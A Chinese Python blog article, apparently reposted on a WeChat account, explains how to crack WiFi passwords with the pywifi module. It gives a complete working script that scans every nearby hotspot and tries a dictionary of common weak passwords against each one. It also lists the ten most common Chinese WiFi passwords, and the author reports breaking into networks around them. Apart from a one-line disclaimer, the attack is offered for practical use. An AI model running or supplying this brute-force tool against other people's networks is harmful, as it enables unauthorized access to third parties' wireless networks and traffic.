专栏名称: 编程派
Python程序员都在看的公众号,跟着编程派一起学习Python,看最新国外教程和资源!
目录
相关文章推荐
Python爱好者社区  ·  深度学习“四大名著”发布 ·  3 天前  
Python中文社区  ·  用 Python 计算股票的支撑位和阻力位 ·  5 天前  
Python爱好者社区  ·  算法入门手册 ·  5 天前  
Python爱好者社区  ·  今天面了一个阿里算法女生,当场想给她offer! ·  1 周前  
Python爱好者社区  ·  见证历史,79万封神 ·  6 天前  
51好读  ›  专栏  ›  编程派

WiFi密码怎么破?一个Python脚本搞定

编程派  · 公众号  · Python  · 2017-02-06 11:36

正文

「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~

本文仅供大家参考,不要滥用哦。

原文:https://my.oschina.net/Apathy/blog/821039

环境准备

  • python 2.7

  • 凑合的 linux

  • 差不多的无线网卡

  • pywifi模块

  • 弱口令字典

  • 清除系统中的任何 wifi 连接记录 \ (非常重要 \ ! \ ! \ ! \ )

首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

  1. from pywifi import *

  2. import time

  3. import sys

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10:

  1. 12345678

  2. 123456789

  3. 88888888

  4. 1234567890

  5. 00000000

  6. 87654321

  7. 66668888

  8. 11223344

  9. 147258369

  10. 11111111

配置扫描器

推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里

  1. def main():

  2.    #扫描时常

  3.    scantimes = 3

  4.    #单个密码测试延迟

  5.    testtimes = 15

  6.    output = sys.stdout

  7.    #结果文件保存路径

  8.    files = "TestRes.txt"

  9.    #字典列表

  10.    keys = open(sys.argv[1],"r").readlines()

  11.    print "|KEYS %s"%(len(keys))

  12.    #实例化一个pywifi对象

  13.    wifi = PyWiFi()

  14.    #选择定一个网卡并赋值于iface

  15.    iface = wifi.interfaces()[0]

  16.    #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

  17.    scanres = scans(iface,scantimes)

  18.    #统计附近被发现的热点数量

  19.    nums = len(scanres)

  20.    print "|SCAN GET %s"%(nums)

  21.    print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)

  22.    #将每一个热点信息逐一进行测试

  23.    for i,x in enumerate(scanres):

  24.        #测试完毕后,成功的结果讲存储到files中

  25.        res = test(nums-i,iface,x,keys,output,testtimes)

  26.        if res:

  27.            open(files,"a").write(res)

扫描周围热点

  1. def scans(face,timeout):

  2.    #开始扫描

  3.    face.scan()

  4.    time.sleep(timeout)

  5.    #在若干秒后获取扫描结果

  6.    return face.scan_results()

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

  1. def test(i,face,x,key,stu,ts):

  2.    #显示对应网络名称,考虑到部分中文名啧显示bssid

  3.    showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid

  4.    #迭代字典并进行爆破

  5.    for n,k in enumerate(key):

  6.        x.key = k.strip()

  7.        #移除所有热点配置

  8.        face.remove_all_network_profiles()

  9.        #讲封装好的目标尝试连接

  10.        face.connect(face.add_network_profile(x))

  11.        #初始化状态码,考虑到用0会发生些逻辑错误

  12.        code = 10

  13.        t1 = time.time()

  14.        #循环刷新状态,如果置为0则密码错误,如超时则进行下一个

  15.        while code!=0 :

  16.            time.sleep(0.1)

  17.            code = face.status()

  18.            now = time.time()-t1

  19.            if now>ts:

  20.                break

  21.            stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n","")))

  22.            stu.flush()

  23.            if code == 4:

  24.                face.disconnect()

  25.                return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k)

  26.    return False

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

  • * WIFIID * _ 热点的 id 号 每跑一个会减1

  • * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址

  • * N * _ 对热点的连接状态,这个在

  • * _time_ * 当前所花去的时间

  • * _signal_ * 热点的信号强度,若小越好

  • * _KEYNUM_ * 测试密码的 id 每跑一个会减1

  • * _KEY_ * 当前测试的密码

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

传送门

后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。


题图:pexels,CC0 授权。

点击阅读原文,查看更多 Python 教程和资源。

推荐文章
Python爱好者社区  ·  深度学习“四大名著”发布
3 天前
Python中文社区  ·  用 Python 计算股票的支撑位和阻力位
5 天前
Python爱好者社区  ·  算法入门手册
5 天前
Python爱好者社区  ·  见证历史,79万封神
6 天前
酱子工厂  ·  装B没有好下场,笑惨!
7 年前